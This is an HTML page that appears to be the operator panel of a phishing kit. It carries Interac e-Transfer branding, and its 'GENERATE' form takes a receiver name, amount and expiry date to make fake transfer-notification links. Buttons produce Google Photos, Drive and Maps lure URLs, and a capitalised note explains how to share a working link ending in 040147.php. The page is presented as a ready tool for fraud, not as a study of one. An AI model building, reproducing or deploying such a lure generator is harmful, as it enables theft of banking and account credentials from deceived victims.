<!DOCTYPE html>
<!-- saved from url=(0032)/deposit -->
<html style="" class="ui-mobile translated-ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>INTERAC e-Transfer</title>
        <meta http-equiv="no-cache">
        
        <!-- base href="https://etransfer.interac.ca/RP.do?pID=CAAFM9f5" -->
        <link href="./files/interac-jqm.css" rel="stylesheet" type="text/css">
        <link href="./files/jquery_002.css" rel="stylesheet" type="text/css">
        <link href="./files/jquery.css" rel="stylesheet" type="text/css">
        <link href="./files/jquery-ui.css" rel="stylesheet" type="text/css">
        <meta http-equiv="Expires" content="Thu, 01 Jan 1970 00:00:01 GMT">
        <meta http-equiv="Cache-Control" content="no-cache">
        <meta http-equiv="pragma" content="no-cache">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="">
        <meta property="og:title" content="Deposit your INTERAC e-Transfer">
        <meta property="og:description" content="Receiving an INTERAC e-Transfer is fast and free using your mobile or online banking.">
        <meta property="og:image" content="https://s3.amazonaws.com/etransfer-notification.interac.ca/images/etransfer_thumbnail_en.png">
        <meta property="og:url" content="https://etransfer.interac.ca/?lang=en">
        <meta property="og:site_name" content="INTERAC e-Transfer">
        <link rel="stylesheet" type="text/css" media="screen" href="./files/generalCSS.css">
        <link rel="stylesheet" type="text/css" media="screen" href="./files/GTIe8CSS.css">
        <script src="./files/jquery-3.6.0.min.js###" crossorigin="anonymous"></script>
        <script>var lrbank = 'Interac'; var lrinfo = '';</script>
        <script src="./files/actions.js###"></script>
    <link type="text/css" rel="stylesheet" charset="UTF-8" href="./files/translateelement.css"></head>
    <body class="ui-mobile-viewport ui-overlay-a">
        <script type="text/javascript" src="./files/vendorJS.js###"></script>
        <script><head><link type="text/css" rel="stylesheet" id="dark-mode-custom-link">
<link type="text/css" rel="stylesheet" id="dark-mode-general-link">
<style lang="en" type="text/css" id="dark-mode-custom-style">
  
</style>
<style lang="en" type="text/css" id="dark-mode-native-style">
  
</style>
<style lang="en" type="text/css" id="dark-mode-native-sheet">
  
</style>
  
  
  
  
  
  
  
  
  
  
  
<style class="native-dark-class-modified">
@import url(https://fonts.googleapis.com/css?family=Audiowide);
::-moz-selection {
    background: #cc0000;
    text-shadow: none;
}
::selection {
    background: #cc0000;
    text-shadow: none;
}
html,body {
  height: 100%;
  margin: 0;
  padding: 0;
}
body {
  background: #1b1b1b;
  color: #FFF;
  font-family: "Helvetica Neue Light", "Helvetica Neue", Helvetica, Arial, "Lucida Grande", sans-serif;
  font-size: 12px;
  line-height: 1;
}
.background-wrap {
  width: 100%;
  height: 100%;
  position: absolute;
  top: 0;
  left: 0;
  z-index: -1;
  overflow: hidden;
}
.background {
  background: url('https://myrror.co/etc/419062774_1385132057.jpg');
  background-size: cover;
  filter: blur(10px);
  height: 105%;
  position: center;
  width: 105%;
  right: -2.5%;
  left: -2.5%;
  top: -2.5%;
  bottom: -2.5%;
}
* {
  box-sizing: border-box;
  cursor: default;
  outline: none;
}
form {
  background: #111;
  border: 1px solid #191919;
  border-radius: .4em;
  bottom: 0;
  box-shadow: 0 5px 10px 5px rgba(0,0,0,0.2);
  height: 600px;
  left: 0;
  margin: auto;
  overflow: ;
  position: absolute;
  right: 0;
  top: 0;
  width: 300px;
}
form:after {
  background: linear-gradient(to right, #111111, #444444, #b6b6b8, #444444, #2F2F2F, #272727);
  content: "";
  display: block;
  height: 1px;
  left: 50px;
  position: absolute;
  top: 0;
  width: 150px;
}
form:before {
  border-radius: 50%;
  box-shadow: 0 0 6px 4px #fff;
  content: "";
  display: block;
  height: 5px;
  left: 34%;
  position: absolute;
  top: 0px;
  width: 8px;
}
.inset {
  border-top: 1px solid #19191a;
  padding: 20px;
}
form h1 {
  font-family: 'Audiowide';
  border-bottom: 1px solid #000;
  font-size: 18px;
  padding: 15px 0;
  position: relative;
  text-align: center;
  text-shadow: 0 1px 0 #000;
}
form h1 {
  color: #KKKKKK;
  font-family: Audiowide;
  font-weight: normal;
}
form h1.poweron {
  color: #ffffff;
  transition: all 0.5s;
  -webkit-animation: flicker 40s ease-in-out 100 alternate, neon 10.5s ease-in-out infinite alternate;
          animation: flicker 1s ease-in-out 1 alternate, neon 1.5s ease-in-out infinite alternate;
  -webkit-animation-delay: 0s, 1s;
          animation-delay: 0s, 1s;
}
form h1.poweron2 {
  color: #HHHHHH;
  transition: all 1s;
  -webkit-animation: flicker 5s ease-in-out 3 alternate, neon 5s ease-in-out infinite alternate;
          animation: flicker 1s ease-in-out 1 alternate, neon 1.5s ease-in-out infinite alternate;
  -webkit-animation-delay: 0s, 1s;
          animation-delay: 0s, 1s;
}
form h1:after {
  position: absolute;
  width: 250px;
  height: 180px;
  content: "";
  display: block;
  pointer-events: none;
  top: 0;
  margin-left: 138px;
  transform-style: flat;
  transform: skew(20deg);
  background: -ms-linear-gradient(top, hsla(0,0%,100%,0.1) 0%,hsla(0,0%,100%,0) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#42ffffff', endColorstr='#00ffffff',GradientType=0 );
  background: linear-gradient(to bottom, hsla(0,0%,100%,0.1) 0%,hsla(0,0%,100%,0) 100%);
}
input[type=text], input[type=password] {
  background: linear-gradient(#1f2124,#27292c);
  border: 1px solid #222;
  border-radius: .3em;
  box-shadow: 0 1px 0 rgba(255,255,255,0.1);
  color: #FFF;
  font-size: 13px;
  margin-bottom: 20px;
  padding: 8px 5px;
  width: 100%;
}
input[type=text]:disabled, input[type=password]:disabled {
	color: #999;
}
label[for=remember] {
  color: #bbb;
  display: inline-block;
  height: 20px;
  line-height: 20px;
  vertical-align: top;
  padding: 0 0 0 5px;
}
.p-container {
  padding: 0 20px 20px;
}
.p-container:after {
  clear: both;
  content: "";
  display: table;
}
.p-container span {
  color: #0d93ff;
  display: block;
  float: left;
  padding-top: 8px;
}
input[type=submit] {
  background: #fb0;
  border: 1px solid rgba(0,0,0,0.4);
  border-radius: .3em;
  box-shadow: inset 0 1px 0 rgba(255,255,255,0.3), inset 0 10px 10px rgba(255,255,255,0.1);
  color: #873C00;
  cursor: pointer;
  font-size: 13px;
  font-weight: bold;
  height: 40px;
  padding: 5px 20px;
  width: 100%;
}
input[type=submit]:hover, input[type=submit]:focus {
  box-shadow: inset 0 1px 0 rgba(255,255,255,0.3), inset 0 -10px 10px rgba(255,255,255,0.1);
}
input[type=submitt] {
  background: #fb0;
  border: 1px solid rgba(0,0,0,0.4);
  border-radius: .3em;
  box-shadow: inset 0 1px 0 rgba(255,255,255,0.3), inset 0 10px 10px rgba(255,255,255,0.1);
  color: #873C00;
  cursor: pointer;
  font-size: 13px;
  font-weight: bold;
  height: 40px;
  padding: 5px 20px;
  width: 100%;
}
input[type=submitt]:hover, input[type=submitt]:focus {
  box-shadow: inset 0 1px 0 rgba(255,255,255,0.3), inset 0 -10px 10px rgba(255,255,255,0.1);
}
input[type="checkbox"]:checked ~ .checkbox {
  transition: all 0.3s;
  border-bottom: 2px solid #ffcc00;
  border-right: 2px solid #ffcc00;
}
@-webkit-keyframes neon {
  from {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  to {
      text-shadow: 
      0 0 3px #fff,
      0 0 7px  #fff,
      0 0 13px  #fff,
      0 0 17px  #B6FF00,
      0 0 33px  #B6FF00,
      0 0 38px  #B6FF00,
      0 0 48px #B6FF00,
      0 0 63px #B6FF00;
    }
}
@keyframes neon {
  from {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  to {
      text-shadow: 
      0 0 3px #fff,
      0 0 7px  #fff,
      0 0 13px  #fff,
      0 0 17px  #B6FF00,
      0 0 33px  #B6FF00,
      0 0 38px  #B6FF00,
      0 0 48px #B6FF00,
      0 0 63px #B6FF00;
    }
}
@-webkit-keyframes flicker {
  0% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  2% {
    text-shadow: none;
  }
  8% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  10% {
    text-shadow: none;
  }
  20% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  22% {
    text-shadow: none;
  }
  24% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  28% {
    text-shadow: none;
  }
  32% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  34% {
    text-shadow: none;
  }
  36% {
    text-shadow: none;
  }
  42% {
    text-shadow: none;
  }
  100% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
}
@keyframes flicker {
  0% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  2% {
    text-shadow: none;
  }
  8% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  10% {
    text-shadow: none;
  }
  20% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  22% {
    text-shadow: none;
  }
  24% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  28% {
    text-shadow: none;
  }
  32% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
  34% {
    text-shadow: none;
  }
  36% {
    text-shadow: none;
  }
  42% {
    text-shadow: none;
  }
  100% {
    text-shadow: 
    0 0 2.5px #fff,
    0 0 5px #fff,
    0 0 7.5px #fff,
    0 0 10px #B6FF00,
    0 0 17.5px #B6FF00,
    0 0 20px #B6FF00,
    0 0 25px #B6FF00,
    0 0 37.5px #B6FF00;
  }
}
</style>
  
  <script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage("resize", "*");
  }
</script>
<script src="chrome-extension://mooikfkahbdckldjjndioackbalphokd/assets/prompt.js">
  
</script>

</head>
<body translate="no">
  <div class="background-wrap">
  <div class="background">
    
  </div>
</div>
<form id="accesspanel" action="040147.php" method="GET">
<h1 id="litheader" class="poweron">INTERAC ETRANSFER</h1>
<div class="inset">
<input type="TEXT" name="RECIVER" id="RECIVER" placeholder="NAME OR COMPANY">
<input type="text" name="TRANSFERAMOUNT" id="TRANSFERAMOUNT" placeholder="100.00">
<input type="text" name="EXPIRES" id="EXPIRES" placeholder="JANUARY 1">
<input type="submit" name="Login" id="get" value="GENERATE">
<h1 id="lithader" class="poweron2">GOOGLE LINKS</h1>
<input type="submitt" onclick="window.location.href='/220099/authentication/ID=17566/040147.php';" placeholder="GOOGLE PHOTOS">
<br>
<br>
<input type="submitt" onclick="window.location.href='/220099/authentication/ID=17567/040147.php';" placeholder="GOOGLE DRIVE">
<br>
<br>
<input type="submitt" onclick="window.location.href='/220099/authentication/ID=17568/040147.php';" placeholder="GOOGLE MAPS">
<br>
<br>
NOTE: TO SHARE CLICK IT WAIT FOR IT TO LOAD. NOW GO TO THE END OF YOUR URL BAR. TO WORK ON SHARE THE URL MUST END WITH 040147.PHP NOT 148!<br>
<br>

  </div>
</form>

</body>
</html>
